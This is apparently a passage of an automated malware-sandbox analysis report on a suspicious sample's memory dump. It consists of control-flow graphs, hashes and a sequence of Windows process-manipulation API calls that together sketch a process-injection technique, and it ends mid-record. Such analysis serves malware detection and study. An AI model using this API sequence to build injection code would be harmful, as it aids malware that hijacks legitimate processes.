                                                                          control_flow_graph 72 a534a1-a535cd 73 a535d4-a53612 call a53bd1 72->73 74 a535cf 72->74 76 a53618 73->76 74->73 77 a5361f-a5363b 76->77 78 a53644-a53645 77->78 79 a5363d 77->79 80 a539c9-a539d0 78->80 81 a5364a-a53661 78->81 79->76 79->80 79->81 82 a53724-a53738 79->82 83 a536c1-a536ef 79->83 84 a53663-a5366f 79->84 85 a5376d-a5377a 79->85 86 a537ac-a537b8 79->86 87 a53909-a53912 79->87 88 a5386b-a5386f 79->88 89 a536f4-a536f8 79->89 90 a53854-a53866 79->90 91 a53694-a536a0 79->91 92 a53817-a5382c 79->92 93 a53996-a539ad 79->93 94 a53971-a53977 79->94 95 a53831-a5384f 79->95 96 a539b2-a539c4 79->96 97 a5373d-a53741 79->97 98 a537fd-a53812 79->98 99 a5377f-a5378b 79->99 100 a5393e-a53955 79->100 101 a5389b-a538a7 79->101 102 a5395a-a5396c 79->102 81->77 82->77 83->77 109 a53676-a53692 84->109 110 a53671 84->110 85->77 107 a537bf-a537d5 86->107 108 a537ba 86->108 111 a53925-a5392c 87->111 112 a53914-a53923 87->112 115 a53871-a53880 88->115 116 a53882-a53889 88->116 117 a5370b-a53712 89->117 118 a536fa-a53709 89->118 90->77 113 a536a7-a536bc 91->113 114 a536a2 91->114 92->77 93->77 125 a5397f-a53991 94->125 95->77 96->77 103 a53754-a5375b 97->103 104 a53743-a53752 97->104 98->77 105 a53792-a537a7 99->105 106 a5378d 99->106 100->77 119 a538ae-a538c4 101->119 120 a538a9 101->120 102->77 121 a53762-a53768 103->121 104->121 105->77 106->105 135 a537d7 107->135 136 a537dc-a537f8 107->136 108->107 109->77 110->109 124 a53933-a53939 111->124 112->124 113->77 114->113 122 a53890-a53896 115->122 116->122 123 a53719-a5371f 117->123 118->123 133 a538c6 119->133 134 a538cb-a538e1 119->134 120->119 121->77 122->77 123->77 124->77 125->77 133->134 140 a538e3 134->140 141 a538e8-a53904 134->141 135->136 136->77 140->141 141->77
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Mgr$a)*]$z"L$
                                                                          • API String ID: 0-2897993153
                                                                          • Opcode ID: e38fda0c0c57c6f3dbb5f438bf3b7be03b827266e779315569e1cb3ad5431a06
                                                                          • Instruction ID: ff8d07955da9d9ecc18c545d9ba0c32b644fe56ddc14836e349394b8f1be5450
                                                                          • Opcode Fuzzy Hash: e38fda0c0c57c6f3dbb5f438bf3b7be03b827266e779315569e1cb3ad5431a06
                                                                          • Instruction Fuzzy Hash: 37F1BFB0D0924ADFCB04CFA5C88549EFFB2FF89341B24959AC901AB755D3349A4ACF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 256 a51271-a51363 257 a51365 256->257 258 a5136a-a513b6 256->258 257->258 261 a513b9 258->261 262 a513c0-a513dc 261->262 263 a513e5-a513e6 262->263 264 a513de 262->264 265 a515e4-a51675 263->265 266 a513eb-a513f3 call a51c50 263->266 264->261 264->265 264->266 267 a51585-a51589 264->267 268 a5140d-a51411 264->268 269 a5146d-a51485 264->269 270 a5154c-a51580 264->270 271 a515b5-a515df 264->271 272 a514f7-a5152b 264->272 273 a51530-a51547 264->273 274 a514b8-a514d6 264->274 275 a514db-a514f2 264->275 276 a5143a-a5144a call a516c8 264->276 300 a51677 call a532c0 265->300 301 a51677 call a52630 265->301 302 a51677 call a52fbb 265->302 288 a513f9-a5140b 266->288 277 a5159c-a515a3 267->277 278 a5158b-a5159a 267->278 279 a51424-a5142b 268->279 280 a51413-a51422 268->280 291 a51487-a51496 269->291 292 a51498-a5149f 269->292 270->262 271->262 272->262 273->262 274->262 275->262 294 a51450-a51468 276->294 281 a515aa-a515b0 277->281 278->281 285 a51432-a51438 279->285 280->285 281->262 285->262 288->262 293 a514a6-a514b3 291->293 292->293 293->262 294->262 299 a5167d-a51687 300->299 301->299 302->299
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: pL5
                                                                          • API String ID: 0-2485517154
                                                                          • Opcode ID: 77c7a060bb5a9b5f5f9649150e0d1204479dc1f90159370ce1e272195ca7b529
                                                                          • Instruction ID: af82960d9d35e3a780f68954e587fe01d6c2b09d59e8bc31623dc0db1926467d
                                                                          • Opcode Fuzzy Hash: 77c7a060bb5a9b5f5f9649150e0d1204479dc1f90159370ce1e272195ca7b529
                                                                          • Instruction Fuzzy Hash: F6D17BB4E096498FCB04CFA4C895AEEFBF2BF89301F24816AD805AB755D7349906CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: pL5
                                                                          • API String ID: 0-2485517154
                                                                          • Opcode ID: 4524fddd64e41ed54c6c48af01e71a9fec66f7a11e0c463f0488d67752db15f3
                                                                          • Instruction ID: a63ce9ffb48b527f95b6e1568961b5722d68a415d84f752d96bf595fc0a461dc
                                                                          • Opcode Fuzzy Hash: 4524fddd64e41ed54c6c48af01e71a9fec66f7a11e0c463f0488d67752db15f3
                                                                          • Instruction Fuzzy Hash: BEB1E1B4E04219DFDB48CFA9C980AAEBBF2FF88305F20952AD915AB354D7349905CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ab55ed39be4952099a613cbd6469f7e8c86b789b996ac141f9e8f067fef2c46c
                                                                          • Instruction ID: 65e0503e5f5766b8bca3aa3da0ba1902f9deb74d42436214a37c866b414c0371
                                                                          • Opcode Fuzzy Hash: ab55ed39be4952099a613cbd6469f7e8c86b789b996ac141f9e8f067fef2c46c
                                                                          • Instruction Fuzzy Hash: EBA2AE70E112288FDB65EF28D984BEDB7B1BB49301F5081EAE90DA7251DB345E84CF61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 268c485d773fb8d8e208de16edb6fe0da41f873b58a046f5de7b89a383372f87
                                                                          • Instruction ID: 83104c56b7bffb76d27468170af81b06386213d70dba9ce8e6d0770542410388
                                                                          • Opcode Fuzzy Hash: 268c485d773fb8d8e208de16edb6fe0da41f873b58a046f5de7b89a383372f87
                                                                          • Instruction Fuzzy Hash: 3A529474A002198FDB64CF69D984B9DBBF2BF59301F1481E9E909A73A1DB30AD84CF10
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 734bd2ca19f55171bf330d0c0fa7e20770b33cdc1f55ccd6ee0ee1c2daa7ada7
                                                                          • Instruction ID: ebae518a4bca7f522067f9e114cd5334344dd3e0fbde2d571b33eeb551d783d2
                                                                          • Opcode Fuzzy Hash: 734bd2ca19f55171bf330d0c0fa7e20770b33cdc1f55ccd6ee0ee1c2daa7ada7
                                                                          • Instruction Fuzzy Hash: 54C1F974E04218DFCB54DFA5E884A9EBBB2FF89340F20D069D919AB364DB349985CF10
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7ff0f46f3d8608279d5a4994b9354fa570b90307a786212138c33fdb59751ed9
                                                                          • Instruction ID: 3504609367b6c8debd61820b0adb1034668d47bb905914ac86b72b29987cbf86
                                                                          • Opcode Fuzzy Hash: 7ff0f46f3d8608279d5a4994b9354fa570b90307a786212138c33fdb59751ed9
                                                                          • Instruction Fuzzy Hash: A0C1F874E04218DFDB54DFA5E884A9EBBB2FF89340F20D069D919AB364DB349985CF10
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e39178b16353a14c419a3defa7a93772cf99fbbc4b58cce456503d7593d7c161
                                                                          • Instruction ID: adb1b1e7f6232d05ff69cc55ccd1ecf56194d23288adaafd76dd8d47d4b7ea25
                                                                          • Opcode Fuzzy Hash: e39178b16353a14c419a3defa7a93772cf99fbbc4b58cce456503d7593d7c161
                                                                          • Instruction Fuzzy Hash: 1B81C075E05209DFCB08CFA9D5849AEBBB2BF89311F24902AD819AB364D7349905CF60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2b1dbf981389ddd60dd511824eb7cb39280ec0139c190b7e341543264098b3c9
                                                                          • Instruction ID: 7690a90310cb4485c417838c9b942ac1cb1e75f8d6a3659f33b4f6068cade77a
                                                                          • Opcode Fuzzy Hash: 2b1dbf981389ddd60dd511824eb7cb39280ec0139c190b7e341543264098b3c9
                                                                          • Instruction Fuzzy Hash: B45119B0E042099FCB08CFA6D8446BEFBF2FB89301F24D46AD815A7355D7348A468F55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b251aa4fd79a0a71b8567e295a743d1f76b05a3359ac5c6a3829b2d33ab1bec9
                                                                          • Instruction ID: 624019c3fdc6513d9ebce757098ee2c6e5dc9ddcf887b50acba67281f8216498
                                                                          • Opcode Fuzzy Hash: b251aa4fd79a0a71b8567e295a743d1f76b05a3359ac5c6a3829b2d33ab1bec9
                                                                          • Instruction Fuzzy Hash: 4B512E74E05218DFCB04CFA6D98199EBBF2FF99301F209469D811B7364DB3899458F25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e2a16cac012222247f3f791b47d3ce2caa21b283446bcc73b27b0afdd86a2540
                                                                          • Instruction ID: ca463c9b8f30473ede697ed6d9fc964ef1718e2142849480baf2e324f8ac09cf
                                                                          • Opcode Fuzzy Hash: e2a16cac012222247f3f791b47d3ce2caa21b283446bcc73b27b0afdd86a2540
                                                                          • Instruction Fuzzy Hash: CC511D74E05219DFCB04CFA5D98199EBBB2FF99301F20A469D411BB364DB389A45CF24
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fa06c9002a01939e234dfa51ad86b9ab206abb830bdc5e2b3680fbfa9226f871
                                                                          • Instruction ID: 6e75d071c1d24f97932fa359be5fa69b29a40764c438e053c075b1c15809592f
                                                                          • Opcode Fuzzy Hash: fa06c9002a01939e234dfa51ad86b9ab206abb830bdc5e2b3680fbfa9226f871
                                                                          • Instruction Fuzzy Hash: 07512574E05209EFCB44CFA5D98099EBBB6FF99301F20A46AD815BB314E7349A058F61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8bb898c6050de320417457dc15a177bca9f30a863b4745adf95f4601af23f266
                                                                          • Instruction ID: b58ec05fcbe3d5b2eaca5742f6e10f5c1db4d9cae77da22388eb4c805256223c
                                                                          • Opcode Fuzzy Hash: 8bb898c6050de320417457dc15a177bca9f30a863b4745adf95f4601af23f266
                                                                          • Instruction Fuzzy Hash: 4A514774E04208EFCB04CFA5D98099EBBF6FF99301F20946AD815BB350D7349A058F20
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 97fe4ed59e158fa7380263b310de707f4260968cd3c5a7e5ee7ba44a6c0bbca4
                                                                          • Instruction ID: 8c3415fa566e7bfd2fe964e3fa25c89e119c7821428683a930d8021cd6621b37
                                                                          • Opcode Fuzzy Hash: 97fe4ed59e158fa7380263b310de707f4260968cd3c5a7e5ee7ba44a6c0bbca4
                                                                          • Instruction Fuzzy Hash: 1D21EAB1E006588BEB18CF9AD8447DEBBF3BFC9311F14C16AD809A6254DB340959CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 144 a5c704-a5cbd5 ReadProcessMemory 147 a5cbd7-a5cbdd 144->147 148 a5cbde-a5cc1c 144->148 147->148
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00A5CBC5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: 0eeac1e6db4e65ffee95220f0197f0112432e22135b8a55edd57420303c9b794
                                                                          • Instruction ID: 57e1cf385bb8564a7a60c9b61585acb483baaf30f1baf7972fddd221d5f77cee
                                                                          • Opcode Fuzzy Hash: 0eeac1e6db4e65ffee95220f0197f0112432e22135b8a55edd57420303c9b794
                                                                          • Instruction Fuzzy Hash: A641E2B5C093989FCB01CFA9D884ADEBFB0BF1A314F05909AE854BB251D3349949CF65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 151 a5c27c-a5c313 152 a5c315-a5c327 151->152 153 a5c32a-a5c338 151->153 152->153 154 a5c34f-a5c38b 153->154 155 a5c33a-a5c34c 153->155 156 a5c38d-a5c39c 154->156 157 a5c39f-a5c47a CreateProcessW 154->157 155->154 156->157 161 a5c483-a5c54c 157->161 162 a5c47c-a5c482 157->162 171 a5c582-a5c58d 161->171 172 a5c54e-a5c577 161->172 162->161 175 a5c58e 171->175 172->171 175->175
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00A5C467
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 43acb7eefde6fdc63810c533f8f65b91709ba7460680e6ae108b0cf212f5a96d
                                                                          • Instruction ID: 687e78100f650f1bfbbae3711b73197d81e05510cb70020bcae21b3a57711dd7
                                                                          • Opcode Fuzzy Hash: 43acb7eefde6fdc63810c533f8f65b91709ba7460680e6ae108b0cf212f5a96d
                                                                          • Instruction Fuzzy Hash: 0081D0B5D0022D8FCF25CFA4D884BDDBBB1BB19304F0490AAE549B7260E7709A89DF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 177 a5c288-a5c313 178 a5c315-a5c327 177->178 179 a5c32a-a5c338 177->179 178->179 180 a5c34f-a5c38b 179->180 181 a5c33a-a5c34c 179->181 182 a5c38d-a5c39c 180->182 183 a5c39f-a5c47a CreateProcessW 180->183 181->180 182->183 187 a5c483-a5c54c 183->187 188 a5c47c-a5c482 183->188 197 a5c582-a5c58d 187->197 198 a5c54e-a5c577 187->198 188->187 201 a5c58e 197->201 198->197 201->201
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00A5C467
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: eb7f1716e12aa65b1c4bb54de2b3765b4df78afdc77587158238331a6d6d997b
                                                                          • Instruction ID: f547201656d2e476f108eb44701d77301929eb3aef01bd260855903ddc3bd9cd
                                                                          • Opcode Fuzzy Hash: eb7f1716e12aa65b1c4bb54de2b3765b4df78afdc77587158238331a6d6d997b
                                                                          • Instruction Fuzzy Hash: 2781C175D0022D9FCF25CFA5D880BDDBBB1BB19304F0490AAE549B7260E770AA89DF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 203 a5cd30-a5cd9f 204 a5cdb6-a5ce16 WriteProcessMemory 203->204 205 a5cda1-a5cdb3 203->205 206 a5ce1f-a5ce5d 204->206 207 a5ce18-a5ce1e 204->207 205->204 207->206
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00A5CE06
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 502bb06b428a06f0fe71c3f8bb0ee2527f9d40839b1637516960b587475307dd
                                                                          • Instruction ID: 198b89b236db95a208ef11e55cb800d0a546d6a15760f958a2f7905311f5dc50
                                                                          • Opcode Fuzzy Hash: 502bb06b428a06f0fe71c3f8bb0ee2527f9d40839b1637516960b587475307dd
                                                                          • Instruction Fuzzy Hash: 294178B9D002589FCF10CFA9D984ADEFBF1BB49314F24902AE814B7210D375AA55CF64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 210 a5cd38-a5cd9f 211 a5cdb6-a5ce16 WriteProcessMemory 210->211 212 a5cda1-a5cdb3 210->212 213 a5ce1f-a5ce5d 211->213 214 a5ce18-a5ce1e 211->214 212->211 214->213
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00A5CE06
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 67a5fe2f9abf19e5c78fcd8fb853679ed93bfd3f9f640d4cdd9f7eb34cc48305
                                                                          • Instruction ID: c18664a89acc07efbd73ec969a1681d5d4f166082e93681f6612b62fed3ba9a4
                                                                          • Opcode Fuzzy Hash: 67a5fe2f9abf19e5c78fcd8fb853679ed93bfd3f9f640d4cdd9f7eb34cc48305
                                                                          • Instruction Fuzzy Hash: D94168B5D002589FCF10CFA9D984ADEFBF1BB49314F24902AE818B7210D375AA55CFA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 217 a5cb18-a5cbd5 ReadProcessMemory 218 a5cbd7-a5cbdd 217->218 219 a5cbde-a5cc1c 217->219 218->219
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00A5CBC5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: 665100ffe36f80013b25d265ffcd2779bd7a810f33575ae1f2d126ab6d6f8aa5
                                                                          • Instruction ID: bcebcad5383f26e97ca0f84150d06bc88c711744531a22fd94bc7a6b38947226
                                                                          • Opcode Fuzzy Hash: 665100ffe36f80013b25d265ffcd2779bd7a810f33575ae1f2d126ab6d6f8aa5
                                                                          • Instruction Fuzzy Hash: DB3165B9D04258DFCF10CFAAD984ADEFBB5BB19324F14A02AE814B7210D375A945CF64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 222 a5cc28-a5cce5 VirtualAllocEx 223 a5cce7-a5cced 222->223 224 a5ccee-a5cd24 222->224 223->224
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00A5CCD5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 5e81b4923b0e900809834978121bd871442f94a9eff5e78db0242ca18e421392
                                                                          • Instruction ID: ff5b44d7fbdc2e4b3c465af9d97cddfeb126eae65a0ea5bab6b0b93d32f3d7a1
                                                                          • Opcode Fuzzy Hash: 5e81b4923b0e900809834978121bd871442f94a9eff5e78db0242ca18e421392
                                                                          • Instruction Fuzzy Hash: F63197B9D002589FCF10CFA9D984ADEFBB1BB19324F14902AE814B7310D335A945CF64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 227 a5cc30-a5cce5 VirtualAllocEx 228 a5cce7-a5cced 227->228 229 a5ccee-a5cd24 227->229 228->229
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00A5CCD5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 2946ff07c0b11c679a9e17b5d6c6eb5457a172ceb389b7b69f2e55f95581fa2f
                                                                          • Instruction ID: e5c3c9bfd92bf8378ade5b9f5aa0b8ab1951f655193f3ac45233e9fa033aeef6
                                                                          • Opcode Fuzzy Hash: 2946ff07c0b11c679a9e17b5d6c6eb5457a172ceb389b7b69f2e55f95581fa2f
                                                                          • Instruction Fuzzy Hash: 8E3173B9D002589FCF10CFA9D984ADEFBB5BB19320F14A02AE818B7310D335A945CF64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 232 a5c600-a5c664 233 a5c666-a5c678 232->233 234 a5c67b-a5c6c2 SetThreadContext 232->234 233->234 235 a5c6c4-a5c6ca 234->235 236 a5c6cb-a5c703 234->236 235->236
                                                                          APIs
                                                                          • SetThreadContext.KERNELBASE(?,?), ref: 00A5C6B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThread
                                                                          • String ID:
                                                                          • API String ID: 1591575202-0
                                                                          • Opcode ID: 0c6c007b0bba4e95745827dba5845975e39d60a24f4eca04acae5490be5d9c69
                                                                          • Instruction ID: 116b72e17d3b7e22a40160ae87cd0265bb8231d71a367013e18e074fda5ce4cd
                                                                          • Opcode Fuzzy Hash: 0c6c007b0bba4e95745827dba5845975e39d60a24f4eca04acae5490be5d9c69
                                                                          • Instruction Fuzzy Hash: F231AAB5D012589FCB10CFA9D984ADEFBF1BB49314F14906AE814B7310D378AA49CF64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 239 a5c608-a5c664 240 a5c666-a5c678 239->240 241 a5c67b-a5c6c2 SetThreadContext 239->241 240->241 242 a5c6c4-a5c6ca 241->242 243 a5c6cb-a5c703 241->243 242->243
                                                                          APIs
                                                                          • SetThreadContext.KERNELBASE(?,?), ref: 00A5C6B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThread
                                                                          • String ID:
                                                                          • API String ID: 1591575202-0
                                                                          • Opcode ID: 7be8c25c3e5d3ab362bdde3048250e064c52f431337b973918eea4dd8cebe692
